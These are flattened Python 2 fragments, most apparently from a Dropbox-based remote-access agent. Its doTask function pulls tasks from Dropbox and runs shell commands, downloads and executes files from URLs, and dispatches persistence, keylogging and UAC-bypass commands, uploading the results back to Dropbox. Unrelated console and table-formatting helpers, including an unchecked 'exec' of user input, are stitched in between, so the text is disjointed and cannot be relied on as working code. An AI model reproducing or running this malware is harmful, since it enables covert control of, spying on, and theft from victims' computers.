def exec_downloadexecute(url): try: r = requests.get(url) filename = url.split('/')[-1] if r.status_code == 200: f = open(filename,'wb') f.write(r.content) f.close() executeBackground(filename) data = "[+] Task Completed Successfully [+]" else: data = "[-] Error [-]" except Exception, err: data = err return base64.b64encode(str(data))
def wrap_onspace(self, text, width): return reduce(lambda line, word, width=width: '%s%s%s' % ( line, ' ' if len(line.rsplit('\n')[-1]+word.split('\n')[0])>=width else '\n', word), text.split(' '))
def getAsRows(self, data): return [row.strip().split(',') for row in data.splitlines()]
def __init__(self, prompt, banner=None): self.prompt = prompt self.banner = banner self.commands = {} self.commandSort = [] self.db = None for i in dir(self): if "cmd_" == i[:4]: cmd = i.split("cmd_")[1].lower() self.commands[cmd] = getattr(self, i) try: self.commandSort.append((int(self .commands[cmd].__doc__.split( "|")[0]), cmd)) except: pass self.commandSort.sort() self.commandSort = [i[1] for i in self.commandSort] self.var_DEBUG = False self.var_tableStyle = '' self.configvars = {} for i in dir(self): if "var_" == i[:4]: var = i.split("var_")[1] self.configvars[var] = i
def execute(self, cmd): try: if not '-table ' in cmd: exec cmd else: file = None table = None fields = [] items = cmd.split() invalidParams = [] table = self.getTable(items[1]) allowedParams = ['fields', 'file'] for i in items: if '=' in i and not i.split('=')[0] in allowedParams: try: invalidParams.append(i) except Exception, err: raise Exception('invalid parameter\n%s' % i) else: if 'file=' in i: file = os.path.abspath(i.split('=')[0].strip()) if 'fields=' in i: for field in i.split('=')[1].split(): if field in self.db[table].fields: fields.append(field.strip()) if len(invalidParams) > 0: print('the following parameter(s) is not valid\n%s' % ','.join(invalidParams)) else: try: self.cmd_table(table, file, fields) except Exception, err: print('could not generate table for table %s\n%s' % (table, err)) except Exception, err: print('sorry, can not do that!\n%s' % err)
def cmd_help(self, *args): '''-3|help|Show's help''' alldata = [] lengths = [] for i in self.commandSort: alldata.append( self.commands[i].__doc__.split("|")[1:]) for i in alldata: if len(i) > len(lengths): for j in range(len(i) - len(lengths)): lengths.append(0) j = 0 while j < len(i): if len(i[j]) > lengths[j]: lengths[j] = len(i[j]) j += 1 print ("-" * (lengths[0] + lengths[1] + 4)) for i in alldata: print (("%-" + str(lengths[0]) + "s - %-" + str( lengths[1]) + "s") % (i[0], i[1])) if len(i) > 2: for j in i[2:]: print (("%" + str(lengths[ 0] + 9) + "s* %s") % (" ", j)) print
def executeBackground(command): subprocess.Popen([command.split()]) return True
def exec_cmd(cmd): data = ExecuteShellCommand(cmd.split()) return base64.b64encode(str(data))
def wrapTable( self, rows, hasHeader=False, headerChar='-', delim=' | ', justify='left', separateRows=False, prefix='', postfix='', wrapfunc=lambda x: x): def rowWrapper(row): '''--- newRows is returned like [['w'], ['x'], ['y'], ['z']] ---''' newRows = [wrapfunc(item).split('\n') for item in row] self.rows = newRows '''--- rowList gives like newRows but formatted like [[w, x, y, z]] ---''' rowList = [[substr or '' for substr in item] for item in map(None, *newRows)] return rowList logicalRows = [rowWrapper(row) for row in rows] columns = map(None, *reduce(operator.add, logicalRows)) self.columns = columns maxWidths = [max( [len(str (item)) for item in column] ) for column in columns] rowSeparator = headerChar * (len(prefix) +len(postfix) + sum(maxWidths) + len(delim) * (len(maxWidths) - 1)) justify = {'center': str.center, 'right': str.rjust, 'left': str.ljust }[justify.lower()] output = cStringIO.StringIO() if separateRows: print >> output, rowSeparator for physicalRows in logicalRows: for row in physicalRows: print >> output,\ prefix + delim.join([ justify(str(item), width) for ( item, width) in zip(row, maxWidths)] ) + postfix if separateRows or hasHeader: print >> output, rowSeparator hasHeader = False return output.getvalue()
def doTask(command,task): mode = (dropbox.files.WriteMode.overwrite) output = {} path = '/%s/output' % agentName try: _, res = dbx.files_download(path) except Exception: dbx.files_upload(json.dumps(output),path,mode) pass _, res = dbx.files_download(path) output = json.loads(res.content.replace('\n','')) # checks for commands with double parameters. if(command.startswith('{SHELL}')): cmd = command.split('{SHELL}')[1] output[task] = {"OUTPUT": exec_cmd(cmd)} if(command.startswith('{DOWNLOAD}')): url = command.split('{DOWNLOAD}')[1] output[task] = {"OUTPUT": exec_downloadexecute(url)} elif(command == "persist"): output[task] = {"OUTPUT": exec_persist()} elif(command == "keylog_start"): output[task] = {"OUTPUT": exec_keylog_start()} elif(command == "keylog_stop"): output[task] = {"OUTPUT": exec_keylog_stop()} elif(command == "bypassuac"): output[task] = {"OUTPUT": exec_bypassuac()} # Upload the output of commands try: dbx.files_upload(json.dumps(output),path,mode) completedTasks.append(task) except Exception: time.sleep(30) pass